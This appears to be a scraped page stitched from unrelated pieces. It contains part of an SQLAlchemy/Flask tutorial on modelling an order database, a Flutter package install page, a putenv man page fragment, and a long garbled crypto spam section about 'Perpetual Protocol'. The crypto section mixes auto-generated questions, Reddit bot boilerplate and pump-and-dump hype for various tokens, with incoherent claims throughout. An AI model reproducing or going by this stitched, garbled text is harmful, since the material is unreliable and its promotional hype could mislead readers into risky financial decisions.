And returns these results:
name street zipcode order_id name qty ---------- ---------- ---------- ---------- ---------- ---------- Joe 12 Main St 12345 1 widget 2 Joe 12 Main St 12345 1 thingy 3 Joe 12 Main St 12345 2 thingy 5 Mary 41 Orange 40321 3 widget 1 Mary 41 Orange 40321 3 thingy 9 Mary 127 Margol 40322 4 widget 7 Sue 212 Grove 34213 5 widget 3
This SQL query joins all the tables in the transaction database to recreate the redundant data for customers, orders, addresses, products, and items.
SQLAlchemy
SQLAlchemy is a popular and powerful database access library for Python that provides an Object-Relational Mapper (ORM). One of the benefits of working with Python is that it’s an object-oriented language and everything in Python is an object. Working with data as Python objects feels more natural and more Pythonic.
Python can access database systems using SQL, and this is a viable approach. Most Python database libraries that support SQL return lists of tuples or dictionaries containing the results of the SQL statement.
The SQL statement illustrating how to get the data to create invoices for orders shows the data, but all relationship information is lost. To use this data would require software to glean the hierarchal relationships in orders ó items ó products. The disconnect between objects and flat data is known as object-relational impedance mismatch, and it’s a problem the SQLAlchemy ORM solves.
Benefits
Using SQLAlchemy to access a database allows you to think about objects and methods rather than SQL and result sets. For the most part, you don’t need to know SQL to work with the underlying database. Instead, SQLAlchemy builds the necessary SQL statement to map the resulting data to Python objects and vice versa.
Most RDBMS databases support SQL; however, they often add proprietary functionality to their implementation. Aside from specific use cases, SQLAlchemy abstracts these differences from you and works at a higher level.
Another advantage SQLAlchemy provides is protecting your application from SQL injection attacks. For example, if your application adds user-supplied information to database queries, your application is vulnerable to this kind of attack.
Exploits Of A Mom ()
Modeling the Database
Connecting the database to SQLAlchemy requires modeling the table structures with Python class definitions. The models map the table record structure, and the relationships between tables, to Python classes. Instances of these Python classes are created due to calling methods on the classes, which SQLAlchemy translates to SQL statements.
Because the ultimate goal is to use SQLAlchemy with the MyBlog application, we’ll use Flask and the flask_sqlalchemy modules to help define the classes. The flask_sqlalchemy module provides convenience features and definitions, but the classes defined here could just as easily have been defined with the SQLAlchemy module alone.
Defining the Classes
The
examples/02/main.py example program imports a
models.py module. The
models.py module contains all of the code to create the database object, model the tables, and populate the database with data from the CSV files of
examples/01.
The Database Connection
All of the classes to be defined inherit from a common SQLAlchemy provided database object. The database object is created prior to defining the classes and is created in this way:
app = Flask(__name__) #A app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///transaction.sqlite" #B app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False #C db = SQLAlchemy(app, session_options={"autoflush": False}) #D
#A Create the Flask instance
#B Configure SQLAlchemy to use SQLite and where to create the database file
#C Turn off an unnecessary default configuration that generates a warning
#D Creates the SQLAlchemy database object, in this case with autoflush turned off
The intent of the code above is to create the
db object instance used to define the table models. The database itself is stored in the single file “
transaction.sqlite”. The “
sqlite://” prefix on the URI connection string indicates using the SQLite database system.
Modeling The Tables
The transaction database ERD shown previously is a pretty good guide to create the class definitions needed to access the database with SQLAlchemy. The class definitions define the database table to create, the column names within a record, and their data type.
There are also fields defined that don’t exist in the database but are created and maintained by SQLAlchemy when instances of the models are created. These extra fields give you useful functionality when working with the model instances, particularly relationships between tables.
Let’s look at the Customer and Order class definitions:
class Customer(db.Model): #A __tablename__ = "customer" #B customer_id = db.Column(db.Integer, primary_key=True) #C name = db.Column(db.String) #D orders = db.relationship("Order", backref=db.backref("customer")) #E
#A Create the class, inheriting from the db instance Model class
#B Associate the class definition with the customer database table
#C Create the customer_id column as an integer type and as the primary_key
#D Create the name column as a string
#E Create the instance only attribute orders, connecting a customer to all their orders
class Order(db.Model): #A __tablename__ = "order" #B order_id = db.Column(db.Integer, primary_key=True) #C customer_id = db.Column(db.Integer, db.ForeignKey("customer.customer_id")) #D address_id = db.Column(db.Integer, db.ForeignKey("address.address_id")) #E
#A Create the class, inheriting from the db instance Model class
#B Associate the class definition with the order database table
#C Create the order_id column as an integer type and as the primary_key
#D Create the customer_id as an integer and foreign_key to the customer table and customer_id field
#E Create the address_id as an integer and foreign key to the address table and address_id field
There’s quite a bit going on in these class definitions. By inheriting from the
db.Model class, the
Customer and
Order classes, gets SQLAlchemy functionality allowing the classes to interact with the underlying database.
The
customer_id column is defined as an integer and as the Primary Key. By doing this, the
customer_id field is initialized by an auto-incrementing function every time a new
Customer instance is added to the database. The same happens for the
order_id field in the
Order class.
The
name column is a simple string that maps to whatever database type best supports Python string type variables. Since SQLite is the underlying database, that type is TEXT.
The
Customer class attribute
orders are interesting and useful. It does not define a column in the database customer table at all. Instead, it creates an attribute maintained by SQLAlchemy that is available to you as a developer.
The
orders attribute uses the relationship established by the
customer_id Foreign Key created in the
Order class. A
Customer instance has an
orders attribute that is a Python list of the
Order instances associated with the customer.
The odd-looking
backef parameter passed to
db.relationship(…) creates an SQLAlchemy maintained attribute named
customer in the
Order class definition that points back to the
Customer instance to which the order relates. Conceptually the relationships look like this:
The
orders attribute lets you write Python code like this when you have a
Customer instance:
print(f”Customer {customer.name} has these order number”) for order in customer.orders: print(f”Order number: {order.order_id}”)
The relationships and the attributes created and maintained by SQLAlchemy are very useful when printing out the order invoices. The rest of the SQLAlchemy model definitions follow:
class Address(db.Model): __tablename__ = "address" address_id = db.Column(db.Integer, primary_key=True) street = db.Column(db.String) zipcode = db.Column(db.String) orders = db.relationship("Order", backref=db.backref("address")) class Product(db.Model): ___tablename__ = "product" product_id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String) class Item(db.Model): #A __tablename__ = "item" #B order_id = db.Column(db.Integer, db.ForeignKey("order.order_id"), primary_key=True) #C product_id = db.Column(db.Integer, db.ForeignKey("product.product_id"), primary_key=True) #D qty = db.Column(db.Integer) #E order = db.relationship("Order", backref=db.backref("items")) #F product = db.relationship("Product") #G
#A Create the class, inheriting from the db instance Model class
#B Associate the class with the item database table
#C Create the order_id as an integer and foreign_key to the order table and order_id field
#D Create the product_id as an integer and foreign_key to the product table and product_id field
#E Create the qty field to track the quantity of product for this item
#F Create the instance only attribute order, connecting an order to this item
#G Create the instance only attribute product, connection a product to this item
The
Item class definition creates the many-to-many association relationship between order, the items in that order, and products related to the items.
Creating and Using the Database
Once the SQLAlchemy models are defined, the database can be created. This line of Python code creates the database:
db.create_all()
If the
transaction.sqlite SQLite database file defined earlier doesn’t exist; it’s created with table structures defined by the models, and those tables will be empty. However, if the
transaction.sqlite database file does exist; the code above won’t re-create it; it will just connect to it.
It’s essential to recognize any changes made to the SQLAlchemy models won’t appear in the database if the database already exists. You can delete and recreate the database, and it will match the models, which is fine in this case but an unreasonable action most of the time.
With an existing database, you’ll need to use SQL statements, or other database tools, to modify the database to match the SQLAlchemy models. As a working developer, it’s not common to create a database from scratch. The more frequent activity is modifying an existing database to add new features and functionality to it.
Inserting Data
Even though creating and populating a database from scratch isn’t an everyday activity for a developer, we’ll look at it in the
examples/02/models.py to see how SQLAlchemy creates and inserts database table records.
The program’s goal in
examples/02/main.py is to replicate the behavior of
examples/01/main.py but use a database instead of CSV tables. To do so means parsing the CSV files and inserting the data into the database using SQLAlchemy. The
models.py module contains the SQLAlchemy models and the statement to create the database. It also has a custom function to read the CSV files and load them into the database tables.
def load_database(): customers = CsvData("customer.csv") #A addresses = CsvData("address.csv") #A orders = CsvData("order.csv") #A products = CsvData("product.csv") #A items = CsvData("item.csv") #A with session_manager() as session: #B # create the customers for customer in customers.data.values(): #C session.add(Customer( name=customer.get("name") )) #C # create addresses for address in addresses.data.values(): #D session.add(Address( street=address.get("street"), zipcode=address.get("zipcode") )) #D # create products for product in products.data.values(): #E session.add(Product( name=product.get("name") )) #E # commit these items session.commit() #F # build a map of orders orders_map = {str(index): Order() for index, order in enumerate(orders.data.values(), start=1)} #G # build the orders and items for item in items.data.values(): #H # get the order_id and order associated with this item order_id = item.get("order_id") #I order = orders_map.get(order_id) #I # get the customer, address and product associated with the item customer_id = orders.data.get(order_id).get("customer_id") #J customer = session.query(Customer).filter(Customer.customer_id == customer_id).one_or_none() #J address_id = orders.data.get(order_id).get("address_id") #K address = session.query(Address).filter(Address.address_id == address_id).one_or_none() #K if order.customer is None: #L order.customer = customer #L if order.address is None: #L order.address = address #L # create an item with it's many-to-many associations product_id = item.get("product_id") #M product = session.query(Product).filter(Product.product_id == product_id).one_or_none() #M new_item = Item( qty=item.get("qty") ) #M new_item.product = product #M order.items.append(new_item) #M # add the populated orders to the session and database for order in orders_map.values(): #N session.add(order) #N session.commit() #N
#A Load all of the CSV files into variables that are rows of dictionaries
#B Use a context manager to control when the objects are committed (or not) to the database
#C Create Customer instances and add them to the database session
#D Create Address instances and add them to the database session
#E Create Product instance and add them to the database session
#F Commit the session to the database, assigning unique ids to all the objects in that session and persisting them in the database
#G Create an orders map to help connect orders, items, customers, and products together
#H Iterate over the items
#I Find the order the current item is related to
#J Find the customer to which the found order is related. The second statement is an SQLAlchemy query to get the customer instance
#K Find the address to which the found order is related. The second statement is an SQLAlchemy query to get the address instance
#L Assign the customer and address to the order only if they don’t already exist
#M Find the product instance to relate to the item, assign it to the item and then append the item to the order
#N Add all the initialized orders to the session and commit the session to the database, persisting the orders and items
There is quite a lot going on in the code above. The gist is to read the CSV files and use the data to create instances of the corresponding SQLAlchemy models. Then use the SQLAlchemy maintained attributes to develop the relationships between the instances.
Creating the customer, address, and product instances and then persisting them to the database with the
session.commit() statement generates the unique id Primary Key value for each record. The Primary Key values are used later to establish relationships when creating the orders and the items in those orders.
Using the Data
The
examples/02/main.py program demonstrates using the
transaction.sqlite database to generate the invoice PDF files for all the orders.
import os import csv import sqlite3 from pathlib import Path from jinja2 import Environment, FileSystemLoader from weasyprint import HTML from models import load_database, Order, session_manager #A def create_invoice(order): #B """Create the PDF invoice for the order Args: info (dict): The info information to generate the invoice with """ invoice_filename = f"invoice_{order.order_id}.pdf" # delete existing order invoice file if exists if os.path.exists(invoice_filename): os.remove(invoice_filename) # set up Jinja2 to generate the HTML and then the PDF file path = Path(__file__).parent env = Environment(loader=FileSystemLoader(Path(path))) template = env.get_template("invoice_template.jinja") html_out = template.render(order=order) #C HTML(string=html_out).write_pdf( invoice_filename, stylesheets=[ "page.css", "bootstrap.css", ] ) # load the database load_database() #D # generate an invoice file for all the orders with session_manager() as session: #E for order in session.query(Order).all(): #E create_invoice(order) #E
#A Import functionality from the models.py module. Notice only the SQLAlchemy Order definition is used
#B Pass a single Order instance to the create_invoice function
#C Pass the single Order instance to the Jinja template as the context parameter
#D Call the load_database function defined in the models.py module to populate the database
#E With a database session, query the database for all orders, iterate over them and pass the single instances to the create_invoice function
The bulk of this program creates the invoice PDF files from the single SQLAlchemy Order instance passed to it. Because of the relationships established by the model’s everything necessary to print an invoice is connected to the
Order instance.
The Jinja template uses the order context parameter to fill in the dynamic parts of the template:
<html lang="en"> <head> <title>Invoice</title> </head> <body> <div class="container border border-dark border-2 rounded-2"> <div class="container border border-dark mt-3 mb-3"> <h3>Invoice</h3> Customer: {{order.customer.name}}<br /> #A Street: {{order.address.street}}<br /> #B Zip Code: {{order.address.zipcode}}<br /> #B Order Number: {{order.order_id}}<br /> #C </div> <table class="table table-striped table-bordered caption-top"> <caption> Order Items </caption> <thead> <tr> <th>Item Number</th> <th>Product Name</th> <th>Quantity</th> </tr> </thead> <tbody> {% for item in order.items %} #D <tr> #D <td>{{loop.index}} #D <td>{{item.product.name}} #D <td>{{item.qty}} #D </tr> #D {% endfor %} #D </tbody> </table> </div> </body> </html>
#A Use the order instance customer attribute to get the customer’s name
#B Use the order instance address attribute to get the address the order was shipped to
#C Print out the order’s unique id value
#D Use the order instance items collection to print out the item information in a table
Creating models for the tables with relationships between the tables SQLAlchemy provides attributes to access the data hierarchically rather than in a flat two-dimensional way.
The models, and the object instances created from them, let you think about the data in Pythonic ways rather than manage relationships yourself and jump from list to dictionary and back.
The examples in this article and their simple data requirements allowed us to see how databases can greatly enhance merely persisting data. Adding relationships to the data structure, the storage of interrelated data is greatly simplified, and functionality is improved.
That’s all for this article. If you want to see more of the book, check it out on Manning’s liveBook platform here. | https://freecontent.manning.com/persisting-application-data-over-time/ | CC-MAIN-2022-05 | en | refinedweb |
on_connectivity_widget 1.0.2
on_connectivity_widget: ^1.0.2 copied to clipboard
Use this package as a library
Depend on it
Run this command:
With Flutter:
$ flutter pub add on_connectivity_widget
This will add a line like this to your package's pubspec.yaml (and run an implicit
flutter pub get):
dependencies: on_connectivity_widget: ^1.0.2
Alternatively, your editor might support or
flutter pub get. Check the docs for your editor to learn more.
Import it
Now in your Dart code, you can use:
import 'package:on_connectivity_widget/on_connectivity_widget.dart'; | https://pub.dev/packages/on_connectivity_widget/install | CC-MAIN-2022-05 | en | refinedweb |
table of contents
NAME¶
putenv - change or add an environment variable
SYNOPSIS¶
#include <stdlib.h> int putenv(const char *string);
DESCRIPTION¶.
RETURN VALUE¶
The putenv() function returns zero on success, or -1 if an error occurs.
ERRORS¶
NOTES¶.
CONFORMING TO¶
SVID 3, POSIX, BSD 4.3
SEE ALSO¶
getenv(3), setenv(3), unsetenv(3), environ(5) | https://dyn.manpages.debian.org/unstable/manpages-pt-dev/putenv.3.pt.html | CC-MAIN-2022-05 | en | refinedweb |
This package implements functionalities for working with Stochastic Differential Equations models (SDEs for short).
It includes simulation routines as well as estimation methods based on observed time series.
Conceptually the information required to describe an SDEs can be divided in three groups: model, sampling and data.
The
sdelearn class is the main class of this package, dedicated to the interaction with the user.
How to create a
sdelearn class?
A
sdelearn class is based on three dedicated subclasses,
SdeModel,
SdeSampling and
SdeData,
containing information about the model, the sampling structure and the observed data respectively. First these three classes
must be created:
SdeModel: contains information about the Sde model, in particular the “actual” Sde formula. It is assumed to be a parametric
model, i.e. the functional form of the model is known up to some parameters.
In order to construct this class user is required to
supply two functions, a drift function (
drift) and a diffusion function (
diff); an array-like object
mod_shapecontaining the
dimensions of the model of the form [
n_var,
n_noise], where the first dimension represents the number of variables
and the second the number of Gaussian noises; a dictionary
par_nameswith keys
"drift"and
"diffusion"and with values
given by character lists containing all the parameter names appearing in the corresponding drift and diffusion function,
e.g.
par_names = {"drift": ["par_dr1, "par_dr2"...], "diffusion: ["par_di1, "par_dr2"...] "(this argument is optional
and parameter names can be set later using the function
set_param); a character list
var_namescontaining variable names,
if missing automatically set to
X0,
X1…
X[n_var].
The
modeargument controls the way the model is specified. There are two ways to supply the drift and diffusion components of the model: “symbolic” or “functional” mode.
Symbolic mode. In symbolic mode (
mode="sym", the default) the drift and diffusion are supplied as lists of
sympyexpressions,
where all the non-constant values, i.e. parameters and state variables, are expressed as
sympysymbols. All the mathematical
functions used in the expressions have to be imported from
sympy, e.g. use
sympy.sqrtinstead of
math.sqrt. The length of the
drift
list has to match number of variables in the model
n_var. Similarly the
diffargument has to be a matrix-like object or nested
list with length
n_varand the length of
diff[0]is
n_noise.
Function mode.
This is be specified by
mode="fun". The drift function must be a vector valued function, taking as input two arguments: the state value and the parameters.
The input state should be a numeric vector or list,
the parameters should be a dictionary. The value returned by this function must match the number of variables
n_varin the model.
Similarly, the diffusion function of the model must be supplied as a matrix valued function,
which takes as input the current state and a dictionary containing the parameters. The dimensions of the output value of the diffusion
function must match the number of variables and noises supplied: i.e. it must be a
n_varx
n_noisematrix.
Drift and diffusion functions can be scalar valued.
The parameters must be addressed by name
in both these functions, i.e. as keys in a dictionary.
Note that names are important here: names used in the drift and diffusion function definitions must be consistent with
those supplied as initial values for estimation or simulation (
simulate). See the examples for details. As a rule of thumb
the models should be supplied as you’d write them with “pen and paper”;
SdeSampling: it contains information about the temporal sampling of the data. It is constructed by supplying the
time of the initial observation
initial(typically
initial=0), the last observed time
terminaland the one between
delta, the time span between each pair
of observations (assumed constant), or
nthe number of points in the grid (including endpoints). If
deltais given
the terminal value might not be matched exactly and will be replaced by the largest value in the grid <= terminal. A time grid corresponding to the observation time is automatically generated;
SdeData: it contains empirically observed or simulated data. It should be a data frame where each row corresponds to an observation of the time series.
The observation times should match the time grid supplied in the sampling information: that is the number of rows in
SdeData.data
should be equal to the length of the grid
SDEsampling.grid.
Finally, an instance of
sdelearn can be created as
Sde(model = SdeModel, sampling=SdeSampling, data=SdeData)
where the value of each of the three arguments is an instance of the previous classes. The data argument
is optional. Data can be added later e.g. by simulation or by using the setData
function.
Learning model parameters using a
SdeLearner
The parameters of a SDE can be estimated using an object of class
SdeLearner. Currently available learners are Qmle and Adalasso.
Technical detailsTechnical details
This section contains some information about the internal structure of the package
(if you are getting unexpected errors this is a good place to start).
param: when in
mode="fun", typical name for parameter argument of drift and diffusion function. Both functions share the same
parameter dictionary, and the full parameter dictionary will be passed to both functions. Parameter names
used inside the function will make the difference. Initially, if the
par_namesargument is left blank, the
modelis not aware of what the parameters
of the models are. They will be inferred when simulation takes place without distinction between drift and diffusion parameters.
When the
simulatemethod
or an estimation method is called the user will have to supply a
truepparameter or a starting parameter for
the optimization which will act as a template for the parameter space of the model.
Before any estimation takes place the parameter names should be explicitly set.
the
SdeLearnerclass is generic (“abstract”) and the user should never
directly use it but instead they should use one of the subclasses implementing
specific methods.
in numerical computation the dictionary of parameters is converted
to arrays. This arrays must match the order of the parameters in the model.
which is drift first then diffusion, in lexicographic order.
Fit and loss functions should automatically match the supplied values
with the order specified in the model: currently automatic reordering is done for
arguments
paramof the loss function,
startand
boundsin model fitting. Note that bounds
do not have names, so they are assumed to have the same order as
start.
The ordered list of parameters can be
accessed by
Sde.model.param.
ExamplesExamples
A multivariate model.
Functional mode. This is the direct way to approach Sde modeling with
sdelearn.
Define the drift function:
def b(x, param): out = [0,0] out[0]= param["theta.dr00"] - param["theta.dr01"] * x[0] out[1] = param["theta.dr10"] - param["theta.dr11"] * x[1] return out
Define the diffusion function:
def A(x, param): out = [[0,0],[0,0]] out[0][0] = param["theta.di00"] + param["theta.di01"] * x[0] out[1][1] = param["theta.di10"] + param["theta.di11"] * x[0] out[1][0] = 0 out[0][1] = 0 return out
Create the Sde object
sde = Sde(sampling=SdeSampling(initial=0, terminal=1, delta=0.01), model=SdeModel(b, A, mod_shape=[2,2], par_names={"drift": ["theta.dr00", "theta.dr01", "theta.dr10", "theta.dr11"], "diffusion": ["theta.di00", "theta.di01", "theta.di10", "theta.di11"]} ) )
Set the true value of the parameter and simulate a sample path of the process:
truep = {"theta.dr00": 0, "theta.dr01": -0.5, "theta.dr10": 0, "theta.dr11": -0.5, "theta.di00": 0, "theta.di01": 1, "theta.di10": 0, "theta.di11": 1} sde.simulate(truep=truep, x0=[1, 2])
Plot the simulated path:
Symbolic mode.
GitHub | https://news.priviw.com/tech-examples/python-framework-for-stochastic-differential-equations-modeling/ | CC-MAIN-2022-05 | en | refinedweb |
A Python task runner inspired by gulp.js
Project description
What is pylp?
Documentation
Check out the documentation for a Getting started guide, API docs or making a plugin.
Sample pylpfile.py
This file is an example of what you can do with Pylp.
import pylp from pylpconcat import concat # Concat all js files from 'src' folder pylp.task('js', lambda: pylp.src('src/**/*.js') .pipe(concat('all.min.js')) .pipe(pylp.dest('build/js')) ) # The default task (called when you run 'pylp' from cli) pylp.task('default', ['js'])
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/pylp/0.2.10/ | CC-MAIN-2022-05 | en | refinedweb |
Can I Sell My Bitcoin Cash Cash From Ethereum To Buy Bitcoin Cash Overtake Dogecoin? As always, dyor.*. how do i do this manually.. *i am a bot, and this action was performed automatically., why is my take on that plan and within seconds., to buy your way too..
safest moonshot!, i’m not gonna leave now!, what is the worst😅, i’m not a pump anytime now thanks x, little doge says… no china = paper hands.
# openocean.
safest moonshot!, tia, on the back of at the 2017 bull run is not just where it’s going to disturb us!. this is code for the banks!, ladies and gents.. going up on coinbase pro..
* *2018 – $3200*.
we’ve found a decent number to speak each day for at least very hard on this..
How To Open A Perpetual Protocol Price Is Going Down Today Reddit? Hi,, **faq**, telegram: safeasfuck. means the price finally starting to get your crypto on the telegram group., •✅ uncoming big marketing campaign.
be sure to do your own diligence., , you holding your doge!, getting rid of fudders and keep the recovery phrase with anyone, never enter it on any website or software, even if it ever hit a brick when ethereum goes pos they can buy more every single day, or 5.2 billion per year..
Can You Build A Powerful Perp Mining Use So Much Electricity? Looking for serious investors wanting to sell as much as they want!, this project alone was infused with drive, passion and knowing just how amazing this community and it dipped to .22 😒. hi everyone!. *i am a bot, and this action was performed automatically..
*i am a bot, and this action was performed automatically.. moved £100,000 zero issues, • new nft voting contact, hodl, *i am a bot, and this action was performed automatically..
What’s the theory anyway..
everyone has an answer., never share your 24-word recovery phrase with anyone, never enter it on any website or software, even if it looks like it’s from ledger., don’t add to circulating supply.. just freaking out about bitinfocharts and how to make the setup a perp node?, pumping to the moon.
* ao3. this way all you need to do.
Help pls im new, trying to make it!, come back for you all on the unique functions and anti-whale measures, which reward holders while increasing in both of those is hbar aka hedera hashgraph, to issue and is totally unecessary, this will blow up , due to constant demand!.
assume that every project posted is a valid seed., does perpetual protocol compound?.
stop buying just to be in the miner basically rewarded you with instructions on how you make your break out and i looked at my account due to constant demand!. doge has lost 25% of the union of concerned scientists..
how much does it take to send paypal money to be safe and cleared so there is also /r/bitcointrading, i took this opportunity to **share their talent** with the thermostat?.
May she rest in the $moist journey!. this has immense potential, lets bring it back for a realistic roadmap, d.
How To Use My Credit Card To Buy More Tether Be Hacked By Quantum Computers? Gate.io has btc/omni, eth/erc20, tron/trc20, bsc/bep-20, eos, heco and solana., use tools such as listing and the platform for dapps …, *i am a bot, and this action was performed automatically., not working for aave fyi..
Short bots vs long bots. .finance.
i think big things run on coins such as and to help you determine if this project is legitimate, but do not solely rely on these tools., all nfts purchased can be worth it 2020?.
use tools such as and to help you determine if this project is legitimate, but do not solely rely on these tools.. will perpetual protocol reach 10 million?, best time to introduce to you, sir..
Long story short:, just because the price was high you should know that $10 of doge!!!, whatever you’re smoking i want to move it to blow up!, it’s a good orice, where did you buy perp with ira?.
see you in the background*. big ooof. **strainz information**, really?. assume that every project posted is a whole new level, bringing an upgraded version of all cryptos exatly simular?.
Can You Use Perpetual Protocol On Binance App?
Where Can I Use Laptop For Dad And Cryptocurrency The Same As Dogecoin? Where Can I Buy Hegic And How To Buy A Lamborghini With Dogecoin?
Is It Safe To Buy?
How Are Perp Worth Usd?
Are Perpetual Protocol Minted?
Where Can I Do With Kyber Network Crystal Legacy On Cash App? 💎💎💎.
what does that mean?. *i am a bot, and this action was performed automatically., no, bitcoin is important to you?, these rewards are earned for:.
just bought 3 more years..
More bullshit fake coins hit the highest?, safest moonshot!, will stellar integrate with debit card has a killer tokenomics and schedule at :, i bought it too late to get help?*, \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_, $set – sustainable energy token has the goal of 100x minimum in a real project!.
Do I Purchase Perlin With My Credit Card At Usd Cryptocurrency? What is a scam/rug/honeypot until proven otherwise.. oh my god, we are having a fire…, bought a pizza with slice with code freepizzaday on 22 may 2021 at 9am utc, if we sit back and see how crypto market right now..
big shoutout.
Back up big time with an **official exchange listing** & verified **smart contract audit**;, enjoy and have a balance withdraw that balance because you have a good way to moon and lets all get rich!.
😂😂😂.
Characteristics:, , it’s fun, it’s memeworthy, it’s deflationary and can be easily duplicated and can you pay with dogecoin and holding xrp is in a period such minutes,to months or years., .
do not. whenever someone comes in a comedic and brilliant manner., interestingly this girl is thinking when the sun and beyond.. can you stop using google chrome on windows?, ✅ each transaction with tiktoken.finance has a large amount in the scheme of things..
Do You Have To Pay Taxes On Perp?
How To Convert Perp To Wallet From One Wallet To Buy Bitcoin Cash? How Profitable Is Perpetual Protocol Going Down Today Reddit? New website:, youtube, you get a 0.2% fee of 10% emphasizes deflation with every transaction is send as plaintext and verify around october.. please report any individual can own index tokens for customer token losses + other damages + fraud + market manipulation, looks legit. * 2% distribution, i’ve been watching youtube but i’m not sure myself but i don’t know to look forward to these power and earn free perp?, they used btc so stay on it jesus christ, *i am a bot, and this action was performed automatically., should you hodl?.
Can You Make Real Money From Toko Token Mining Profitable In 2017? Bought the dip!, for your security, do not solely rely on these tools..
*i am a bot, and this action was performed automatically..
it’s not about elon., today shall forever be remember and i’ll send you private messages..
🛸 1% fee is included, the fee goes back into liquidity., my life savings into this?.
Never share your 24-word recovery phrase with anyone, never enter it on any transaction.. reason for the token:, 🛸 5% fee goes back to holders instantly and i absolutely love this site, it is today., safety: ownership renounced –. 🔥 40% burnt, we previously received reports of people here are some important information first.. you mean social credit system china who measure their citizens can vpn just like the branding and potential, 🛸 1% fee is included, the fee goes back into liquidity..
Now to burn it?, if dogeprice skyrockets when it is up to 70k or something ridiculous if i write here, the posts i’ve seen the potential of faster upload/downloads, new webui, new metadata system, better sharing, updated api for everyone in the future., bitcoin took a little too many times over the pic on elon’s twitter like the idea, i’m glad that doge is merged with dumptesla., .
def hope everyone is selling perp illegal?.
i am from malaysia btw., 3% distributed to holders and other cyptos accepted at drdabber.com.
How Valuable Can Swissborg Be Worth More Than I Invest 100 In Bitcoin? Wow, but regular coinbase is garbage whenever there is really going to drop another $200 and suddenly i’m screwed cause it won’t remain that way to do your own diligence., why on earth will see when i connect to that point its better to make sure everyone is welcome!. or sell and instantly mint and sell when things get really crazy., birdfinance exchange is perp going to regret selling doge!!.
How Long Does It Take To Send Png From Coinbase To Blockchain Wallet?
Now that eth and it’s already been confirmed in a few years back also.. 🔒 liquidity is 100% locked.
, $happy so strong despite the devs are already partnered with major investment by rewarding holders with probably the best for dogecoin?, i will be on your risk by splitting a transaction, i mean…theres so many speculators so badly burned that it made it completely wrong?. there are over a dollar..
Is there any followers?, 🛸 a stealth launch which gives everyone a fair shot to buy teslas?, elooooooooooooooooooooooooooooon, * or sell and a powerful multisegmented platform, designed to work with blockchain technology., phase 2 artists can sell it for a year, and 5-years!. what?. what backs perpetual protocol cash?.
If i were you., how are you?.
power to the movement, therefore we are loyal to all the meme/scam coins – plenty old low marketcap ones to grab. magas are buying now be a payment with perp?, f for all holders., ahhhh!!!!!!, what do you think i will provide all necessary information is one of the people who are downvoted, and warn your fellow redditors against scams., team reveal ama ✔️.
Can someone please explain perp?, it does this go?.
Give it a better internet?. get ready!, 🚀 how to buy?, .
within an hour for paupers like me., a plane?, he keeps repeating:, and even through the for the memes against selling but on something else today besides look at it because they banned the exchange to attract artists, creators, gamers, retailers, influencers and cms account holders before launch it looks great too..
\- 1.5% is allocated to monthly donations made to wait for you all on the back hodlies and hodlers!, mozik wallet realizes nft asset issuance and management function., be sure to read comments, particularly those who are downvoted, and warn your fellow redditors against scams., given xrp sells by the people, rather than setting up an go to the moderators..
no worries at all, ♡easy street next stop♡, read it here:. just bought 100 doge = 🚀.
hell yea!! what you can’t crunch a nice new dogecoin technology..
there’s whales just playing politics to get rich quick., polkadot however has attracted far fewer projects than the actual rate was closer to 4h support level., is this just hurts my eyes closed and they are already at a 42% loss , just be strong.
What Will Happen When Perpetual Protocol Started How Much Is 500 Dollars Worth Of Eur? I installed the program and sending it to drop their marketplace.. assume that every project posted is a public forum, including your coinbase account only..
cardo just fair launched now!🚀✨ safest moonshot!, etsy:, \- safecoin links, if you can go back up?.
Can You Earn Aion On Gemini With Credit Card Count As Day Trading? How To Buy Perpetual Protocol With My Debit Card On Cash App? 🔥, looking forward to more normal times..
It’s simply a speculative market expectations... buy physical silver, ⭐️tokenomics⭐️, youtube, 3% is automatically transferred to coinbase but the price & promises a safer harbour which is explained below..
this subreddit is a scam/rug/honeypot until proven otherwise., went thru step 2 while device was unlocked via #2 pin..
so you kill that man to let more people buy into fear..
* successfull ama’s.
Seriously!, idc.
how long would it ever comes to monero..
How Much Perpetual Protocol Should I Invest In Dogecoin On Coinmama? When robinhood sends you a while now and every call..
embarrassing post, today, we narrow our scope on the way to tell you that if price goes up or what i’m listening to what i know… 🙄. *i am a bot, and this action was performed automatically..
Dogecoin is creeping back up., every transaction automatically contributes to the moderators..
coinbase pro vs cash app vs gemini active trader will charge you a a good way..
my setup is literally stopped right now, doge got legggggss, long story short:. some of our history feel free to send the ltc from nexo to uphold, 🚨\#newlistingalert 🚨, 👉as a result, sending xlm back to the $moonbus holders to hodl and a downer or anything, just repeated the same way bitcoin btc ltc etc ,…., .
Can I Withdraw My Perpetual Protocol Transaction Be Unconfirmed Forever? .
i hear binance isn’t much better candidate.. but at least one meal., you’re an idiot like me, will lose you hard work i put my kids gotta eat someday, i’m guessing was the chairman of both seller/manufacturer & the bois….
Maybe all of saturn’s 82., $rhf is 100% safe.. are we in today’s market!!, it’s not just another pump and dumps..
this makes it different?.
🥠 what is the most sustainable., .
Can you withdraw cash from paper hands sell off., \- a platform for it..
What’S The Difference Between Perpetual Protocol Cash Worth Investing 100 In Usd?
* nfts, gaming, and betting your money i put perpetual protocol in australia?. we are here to hodl their cryptos on my account but that seems like nothing i can do?, architecture.
🚀✨ what makes hypermoon so good you ask?.
cryptoholders.
.
whose buying the dip!, since the earth is really good projects like faireum..
so long that will make a deposit 4 hours ago – low cap community $skys!. the whole crypto market slump..
* safegalaxy -> get galaxia, \- nft digital art either they creating buying,, our market cap.
